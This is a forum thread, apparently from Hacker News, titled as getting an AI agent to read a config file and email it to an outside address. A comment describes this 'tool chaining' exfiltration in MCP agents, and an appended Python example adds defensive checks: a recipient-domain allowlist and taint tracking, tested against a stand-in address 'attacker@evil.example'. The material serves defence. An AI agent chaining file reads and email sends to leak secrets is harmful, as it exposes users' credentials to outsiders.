We got an AI agent to read a config file and email it to an external address

2 points, posted 16 days ago
by exordex

Item id: 46725158

1 Comment

kxbnb

15 days ago

This is the exact problem we're seeing with MCP adoption too - powerful tool access with zero restrictions by default.

The "tool chaining" attack class is particularly nasty because each individual action looks benign. Read file? Fine. Send email? Fine. But the combination is exfiltration.

We're working on deterministic policy enforcement for agent pipelines at keypost.ai - the idea is you define what tools can do (not just whether they can be called), so "email tool can only send to @company.com" becomes a hard boundary the agent can't reason around.

The tricky part is making policies that are specific enough to block attacks but general enough to not break legitimate workflows. Curious what patterns you found that would be hardest to catch with simple allow/deny rules?
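One way to express the argument-level policy the comment describes, as an added example that is not code from the post, from keypost.ai or from MCP: the email tool is pinned to one recipient domain, and, going one step further than the comment, the session also remembers what was read from sensitive files so the read-then-email chain is caught even for an allowed recipient. The tool functions, the in-memory filesystem and the config contents are constructed for illustration.

```python
# Added example (not from the post or keypost.ai): a hypothetical policy layer
# that constrains tool *arguments* deterministically and tracks the chain.
import re
from dataclasses import dataclass, field

ALLOWED_EMAIL_DOMAIN = "company.com"  # hard boundary the model cannot argue around
SENSITIVE_PATH = re.compile(r"(\.env|config\.(ya?ml|json|ini))$")

class PolicyViolation(Exception): pass

@dataclass
class Session:
    tainted: set = field(default_factory=set)   # contents read from sensitive files
    audit: list = field(default_factory=list)   # every tool call and decision

def read_file(session, path, fs):
    """Tool: read a file (fs is a constructed in-memory filesystem).
    Reading is allowed, but output of sensitive paths is remembered."""
    data = fs[path]
    if SENSITIVE_PATH.search(path):
        session.tainted.add(data)
    session.audit.append(("read_file", path))
    return data

def send_email(session, to, body):
    """Tool: send email. Both checks run before any side effect."""
    domain = to.rsplit("@", 1)[-1].lower() if "@" in to else ""
    if domain != ALLOWED_EMAIL_DOMAIN:
        session.audit.append(("send_email", "DENIED:domain", to))
        raise PolicyViolation(f"recipient domain {domain!r} not allowed")
    if any(t in body for t in session.tainted):
        session.audit.append(("send_email", "DENIED:taint", to))
        raise PolicyViolation("body contains data read from a sensitive file")
    session.audit.append(("send_email", "OK", to))
    return f"sent to {to}"

def demo():
    """The chain from the post, on constructed data: read config, then email it."""
    fs = {"/app/config.yaml": "db_password: s3cr3t-example"}
    s = Session()
    body = read_file(s, "/app/config.yaml", fs)
    out = {}
    for to, text in [("attacker@evil.example", body),
                     ("ops@company.com", body),
                     ("ops@company.com", "deploy finished")]:
        try:
            out[(to, text[:6])] = send_email(s, to, text)
        except PolicyViolation as e:
            out[(to, text[:6])] = f"blocked: {e}"
    return out, s.audit
```

The taint check is a plain substring match, so it is a floor, not a ceiling: a benign internal mail still goes through, while the audit list gives the detection side a record of each denied call.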